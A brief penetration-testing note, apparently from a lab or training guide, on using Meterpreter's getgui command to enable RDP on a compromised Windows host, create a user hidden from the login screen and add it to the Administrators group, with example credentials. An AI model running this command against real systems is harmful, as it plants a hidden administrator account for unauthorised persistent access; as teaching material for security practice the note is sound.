Enabling RDP & New user
Use the
getguiMeterpreter command toEnable the
RDPserviceCreate a new user & hide it from Win Login screen
Add it to
Remote Desktop Users&Administratorsgroups
run getgui -e -u newuser -p attack_1234321📌 New user's credentials are
newuser:attack_1234321

In a new Terminal TAB

The cleanup script provided to remove the added account can be run when the attacker is done with the current system

Last updated